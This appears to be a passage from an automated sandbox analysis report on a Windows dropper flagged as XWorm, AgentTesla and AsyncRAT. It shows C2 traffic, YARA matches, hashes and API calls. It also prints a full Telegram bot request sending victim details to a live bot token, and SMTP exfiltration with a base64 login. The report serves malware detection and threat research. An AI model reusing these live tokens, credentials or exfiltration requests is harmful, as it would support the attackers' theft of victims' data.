Nov 25, 2024 15:39:56.415806055 CET	1717	49987	89.40.31.232	192.168.2.5
Nov 25, 2024 15:39:58.497627974 CET	49987	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:39:58.617973089 CET	1717	49987	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:03.638676882 CET	49987	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:03.758744001 CET	1717	49987	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:03.758836985 CET	49987	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:03.879014969 CET	1717	49987	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:03.983506918 CET	49987	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:04.107280016 CET	1717	49987	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:04.173465967 CET	49987	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:04.293706894 CET	1717	49987	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:07.413423061 CET	1717	49987	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:07.413497925 CET	49987	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:08.965887070 CET	49987	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:08.968673944 CET	49988	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:09.086004019 CET	1717	49987	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:09.114708900 CET	1717	49988	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:09.114798069 CET	49988	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:09.136785984 CET	49988	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:09.258560896 CET	1717	49988	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:09.997370958 CET	49988	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:10.117438078 CET	1717	49988	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:11.669154882 CET	49988	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:11.789186954 CET	1717	49988	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:12.387965918 CET	49988	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:12.509907007 CET	1717	49988	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:13.075401068 CET	49988	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:13.196583033 CET	1717	49988	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:13.840946913 CET	49988	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:13.967153072 CET	1717	49988	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:19.388103008 CET	49988	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:19.511447906 CET	1717	49988	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:21.810177088 CET	49988	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:22.068439007 CET	1717	49988	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:24.544785023 CET	49988	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:24.664972067 CET	1717	49988	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:31.054116964 CET	1717	49988	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:31.054227114 CET	49988	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:36.044013023 CET	49988	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:36.044823885 CET	49989	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:36.165395021 CET	1717	49988	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:36.166178942 CET	1717	49989	89.40.31.232	192.168.2.5
Nov 25, 2024 15:40:36.166282892 CET	49989	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:36.181252956 CET	49989	1717	192.168.2.5	89.40.31.232
Nov 25, 2024 15:40:36.302171946 CET	1717	49989	89.40.31.232	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 15:36:18.994394064 CET	59824	53	192.168.2.5	1.1.1.1
Nov 25, 2024 15:36:19.145001888 CET	53	59824	1.1.1.1	192.168.2.5
Nov 25, 2024 15:36:22.549665928 CET	55768	53	192.168.2.5	1.1.1.1
Nov 25, 2024 15:36:22.702313900 CET	53	55768	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 15:36:18.994394064 CET	192.168.2.5	1.1.1.1	0xc92e	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 25, 2024 15:36:22.549665928 CET	192.168.2.5	1.1.1.1	0xa7d6	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 25, 2024 15:36:19.145001888 CET	1.1.1.1	192.168.2.5	0xc92e	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 25, 2024 15:36:19.145001888 CET	1.1.1.1	192.168.2.5	0xc92e	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 25, 2024 15:36:19.145001888 CET	1.1.1.1	192.168.2.5	0xc92e	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 25, 2024 15:36:22.702313900 CET	1.1.1.1	192.168.2.5	0xa7d6	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.26.13.205	443	6404	C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 14:36:20 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-25 14:36:21 UTC	399	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 14:36:20 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e825ed6de4c0f98-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1499&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1889967&cwnd=174&unsent_bytes=0&cid=abcb4b9d2972d40c&ts=644&x=0"
2024-11-25 14:36:21 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35 Data Ascii: 8.46.123.75

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	149.154.167.220	443	4444	C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 14:36:24 UTC	446	OUT	GET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB01AAE6F744B3247914%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20LYRNOABZ9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-25 14:36:25 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 14:36:24 GMT Content-Type: application/json Content-Length: 444 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 14:36:25 UTC	444	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 36 33 30 38 39 34 31 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 74 65 76 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 74 65 76 65 62 6f 74 32 78 32 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 39 33 30 32 38 37 35 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 61 74 68 75 64 64 6c 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 68 75 64 64 6c 65 6d 61 6e 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 34 35 33 38 34 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57 Data Ascii: {"ok":true,"result":{"message_id":12542,"from":{"id":5630894183,"is_bot":true,"first_name":"steve","username":"stevebot2x2bot"},"chat":{"id":793028759,"first_name":"sathuddle","username":"huddleman01","type":"private"},"date":1732545384,"text":"\u2620 [XW

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 25, 2024 15:36:23.238554955 CET	587	49705	162.254.34.31	192.168.2.5	220 server1.educt.shop127.0.0.1 ESMTP Postfix
Nov 25, 2024 15:36:23.273309946 CET	49705	587	192.168.2.5	162.254.34.31	EHLO 910646
Nov 25, 2024 15:36:23.694010019 CET	587	49705	162.254.34.31	192.168.2.5	250-server1.educt.shop127.0.0.1 250-PIPELINING 250-SIZE 204800000 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Nov 25, 2024 15:36:23.694900036 CET	49705	587	192.168.2.5	162.254.34.31	AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
Nov 25, 2024 15:36:24.136125088 CET	587	49705	162.254.34.31	192.168.2.5	334 UGFzc3dvcmQ6
Nov 25, 2024 15:36:24.550875902 CET	587	49705	162.254.34.31	192.168.2.5	235 2.7.0 Authentication successful
Nov 25, 2024 15:36:24.551141977 CET	49705	587	192.168.2.5	162.254.34.31	MAIL FROM:<sendxambro@educt.shop>
Nov 25, 2024 15:36:24.947067022 CET	587	49705	162.254.34.31	192.168.2.5	250 2.1.0 Ok
Nov 25, 2024 15:36:24.947577953 CET	49705	587	192.168.2.5	162.254.34.31	RCPT TO:<ambro@educt.shop>
Nov 25, 2024 15:36:25.342144012 CET	587	49705	162.254.34.31	192.168.2.5	250 2.1.5 Ok
Nov 25, 2024 15:36:25.342322111 CET	49705	587	192.168.2.5	162.254.34.31	DATA
Nov 25, 2024 15:36:25.736237049 CET	587	49705	162.254.34.31	192.168.2.5	354 End data with <CR><LF>.<CR><LF>
Nov 25, 2024 15:36:25.737209082 CET	49705	587	192.168.2.5	162.254.34.31	.
Nov 25, 2024 15:36:26.256926060 CET	587	49705	162.254.34.31	192.168.2.5	250 2.0.0 Ok: queued as 25D1F76966
Nov 25, 2024 15:38:01.781259060 CET	49705	587	192.168.2.5	162.254.34.31	QUIT
Nov 25, 2024 15:38:02.163774014 CET	587	49705	162.254.34.31	192.168.2.5	221 2.0.0 Bye

Target ID:	0
Start time:	09:36:16
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\DJ5PhUwOsM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DJ5PhUwOsM.exe"
Imagebase:	0x400000
File size:	335'872 bytes
MD5 hash:	D61526463472DA19DD8869F484A8F4EF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:36:17
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe"
Imagebase:	0x4d0000
File size:	240'128 bytes
MD5 hash:	A21DF2C0CCA131EB534F520FD641ADB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4524594091.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.2068435766.00000000004D2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.2068435766.00000000004D2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4524594091.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4524594091.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	09:36:17
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe"
Imagebase:	0xfa0000
File size:	76'800 bytes
MD5 hash:	068C99328320CAAA7C5F2D31B0FF214B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	86.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	47.1%
Total number of Nodes:	17
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00401000 Relevance: 22.6, APIs: 15, Instructions: 119
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceA.KERNEL32(00000000,00000001,0000000A), ref: 0040101D
SizeofResource.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00401034
LoadResource.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040103F
LockResource.KERNEL32(00000000,?,?,?,00000000), ref: 0040104E
GetTempPathA.KERNEL32(00000104,00000000), ref: 0040109B
GetTempFileNameA.KERNELBASE(00000000,00403024,00000000,00000000), ref: 004010B5
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004010CD
sprintf.MSVCRT ref: 004010F5
CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 00401115
WriteFile.KERNELBASE(00000000,00000000,-000000FB,?,00000000,?,?,?,00000000), ref: 0040112E
CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00401135
ShellExecuteA.SHELL32(00000000,00403010,?,00000000,00000000,00000001), ref: 0040114D
FreeResource.KERNEL32(?,?,?,?,00000000), ref: 00401158
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040116A
ExitProcess.KERNEL32 ref: 00401180

Memory Dump Source

Source File: 00000000.00000002.2070623051.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070592492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070652775.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DJ5PhUwOsM.jbxd

Yara matches

Similarity

API ID: FileResource$MoveTemp$CloseCreateExecuteExitFindFreeHandleLoadLockNamePathProcessShellSizeofWritesprintf
String ID:
API String ID: 797060354-0
Opcode ID: 65d69946d058fca2920d4123b4f8b08702cb5f55011c2c6740f72b3e12dceafb
Instruction ID: ed3217094a55de5a2dfbc1ddfccbe6b008effd7532ee54a07616082715565e40
Opcode Fuzzy Hash: 65d69946d058fca2920d4123b4f8b08702cb5f55011c2c6740f72b3e12dceafb
Instruction Fuzzy Hash: E0416671544301ABE3209F60DD49F9B76A8BB88705F000929F785B62D0DAF4D908CBAA

Non-executed Functions

Function 00401190 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 004011BD
__p__fmode.MSVCRT ref: 004011D2
__p__commode.MSVCRT ref: 004011E0
__setusermatherr.MSVCRT ref: 0040120C
_initterm.MSVCRT ref: 00401222
__getmainargs.MSVCRT ref: 00401245
_initterm.MSVCRT ref: 00401255
GetStartupInfoA.KERNEL32(?), ref: 00401294
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004012B8
exit.MSVCRT ref: 004012C8
_XcptFilter.MSVCRT ref: 004012DA

Memory Dump Source

Source File: 00000000.00000002.2070623051.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070592492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070652775.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DJ5PhUwOsM.jbxd

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 2c2fb220dff593ef35955992363a28499ee8bc493f74481fad60155688586b38
Instruction ID: bb7eaed838f3bdbf73850c04b41ab919ceb6e8f5c29665124cd3a4758e11a842
Opcode Fuzzy Hash: 2c2fb220dff593ef35955992363a28499ee8bc493f74481fad60155688586b38
Instruction Fuzzy Hash: 63414CB1801344AFDB20DFA4DA49AAA7BBCBB09711F20017FE941B72E1C7784941CB58

Analysis Process: FB_7BD8.tmp.exePID: 6404, Parent PID: 6224COMMON

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	22
Total number of Limit Nodes:	6

Executed Functions

Function 064F3100 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 064F380B
$eq, xrefs: 064F3858
$eq, xrefs: 064F3828
$eq, xrefs: 064F384C
$eq, xrefs: 064F37FF
$eq, xrefs: 064F3834

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-220072568
Opcode ID: eec3a005ba1c30c370ccfb805916f927fe62b72b39630f96ae0df09d98f8baad
Instruction ID: 0ea6145233d2ba28829ff9d5a7d8432d3626fca90562ef916bbc868432f7ea70
Opcode Fuzzy Hash: eec3a005ba1c30c370ccfb805916f927fe62b72b39630f96ae0df09d98f8baad
Instruction Fuzzy Hash: D8322D31E2061ACFCB15EFB5C99459DF7B2BF89300F50C69AD409A7264EB70AD85CB80

Function 00E73E80 Relevance: 4.0, Strings: 3, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

g , xrefs: 00E73E9F
g , xrefs: 00E73EBF
\V9n, xrefs: 00E740CB

Memory Dump Source

Source File: 00000002.00000002.4524401615.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e70000_FB_7BD8.jbxd

Similarity

API ID:
String ID: \V9n$g $g
API String ID: 0-2967446072
Opcode ID: 0fd9230f2dea018a86fcf06a86f5781632a0ce281a9178d7d5f91cee87d041fa
Instruction ID: 79319e075e75729c22dcbddbb1c3dd9e893ae5ea7df76d74e8090500bdc2b817
Opcode Fuzzy Hash: 0fd9230f2dea018a86fcf06a86f5781632a0ce281a9178d7d5f91cee87d041fa
Instruction Fuzzy Hash: 0D916DB0E002098FDF14DFA8C9857DEBBF2AF88354F14D129E419B7294EB749985DB81

Function 064F7DF0 Relevance: 3.0, Strings: 2, Instructions: 490
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 064F838B
$eq, xrefs: 064F8397

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID: $eq$$eq
API String ID: 0-2246304398
Opcode ID: e23e1604a728269f7b0ae7e0793e263011366c08a1cc1526c2a04ce2388ac0e5
Instruction ID: 5677f51bd864466ecd746af4e41b24ceef3275b65b5e2086afc5733ebcdb2877
Opcode Fuzzy Hash: e23e1604a728269f7b0ae7e0793e263011366c08a1cc1526c2a04ce2388ac0e5
Instruction Fuzzy Hash: 7202C030B206058FDB55DB64D990AAEB7F2FF85300F64896AE515DB395DB31EC42CB80

Function 00E7A958 Relevance: 2.8, Instructions: 2845COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4524401615.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e70000_FB_7BD8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aefda920bd9c969ee355746d0d9b8c2ba8e6bfe737c0b4d2d4bf8d66e80396a
Instruction ID: 9fb3952ba26280366b4c465869fff66f2cdf52fac653b4630929071729c95d40
Opcode Fuzzy Hash: 3aefda920bd9c969ee355746d0d9b8c2ba8e6bfe737c0b4d2d4bf8d66e80396a
Instruction Fuzzy Hash: E163E731D10B1A8EDB11EF68C8846A9F7B1FF99300F15D79AE45977121EB70AAC4CB81

Function 00E7E270 Relevance: 2.8, Strings: 2, Instructions: 340
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xiq, xrefs: 00E7E387
$eq, xrefs: 00E7E36E

Memory Dump Source

Source File: 00000002.00000002.4524401615.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e70000_FB_7BD8.jbxd

Similarity

API ID:
String ID: Xiq$$eq
API String ID: 0-3760103188
Opcode ID: 2130024edb2aeb936d8bd5ec23729e863f3033118d6304fe152923272793e89e
Instruction ID: 11e94f4b4a50afb310c6051e2bac87bd9cfe825304785c27dbe46ad9af27a6fc
Opcode Fuzzy Hash: 2130024edb2aeb936d8bd5ec23729e863f3033118d6304fe152923272793e89e
Instruction Fuzzy Hash: C9B1D870B042589FCB08ABB9A85467E7BA7BFC8700B14C56EE40BEB395DE34DC019791

Function 00E74A98 Relevance: 2.8, Strings: 2, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

g , xrefs: 00E74AD7
g , xrefs: 00E74AB7

Memory Dump Source

Source File: 00000002.00000002.4524401615.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e70000_FB_7BD8.jbxd

Similarity

API ID:
String ID: g $g
API String ID: 0-3051590014
Opcode ID: 00284d62c496029bda56b4bfa0d65de547d0068b4dd7ea232ba468ed90c3d28a
Instruction ID: 8da6d136e27a733886a0ff221b8acdf0b36d2aed3573dfcfd1b828c0d067d696
Opcode Fuzzy Hash: 00284d62c496029bda56b4bfa0d65de547d0068b4dd7ea232ba468ed90c3d28a
Instruction Fuzzy Hash: ADB14DB1E002098FDB20CFA9C98579DBBF2AF88358F14D129D859F7294EB749C45CB81

Function 00E7C36F Relevance: 2.3, Instructions: 2322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4524401615.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e70000_FB_7BD8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d922d9a45c2faf9f675cff3351b2261e289ce3ff72882e87268d29e9f0adf813
Instruction ID: 6c0203efdd1bbfb28c388a0b74f1bfbebaffbba8bc71436adb5707ef09d94491
Opcode Fuzzy Hash: d922d9a45c2faf9f675cff3351b2261e289ce3ff72882e87268d29e9f0adf813
Instruction Fuzzy Hash: C543E631D10B1A8EDB11EF68C8846A9F7B1FF99300F51D79AE45977121EB70AAC4CB81

Function 064F2409 Relevance: 1.0, Instructions: 1018COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff28ecadc538844a41e08e84955259404807781bc4e225ee04febd161435470
Instruction ID: 993b7fbfb4ba3715e537a1a2e3e57a91fc6d4c5f4b8615b1095fc82271f755a8
Opcode Fuzzy Hash: 9ff28ecadc538844a41e08e84955259404807781bc4e225ee04febd161435470
Instruction Fuzzy Hash: EF927730A102048FDB65CFA8C184A5EBBF2FF45314F5488AAE509AB365DB75ED81CB80

Function 064F6668 Relevance: .8, Instructions: 826COMMON

Download Yara Rule

Memory Dump Source

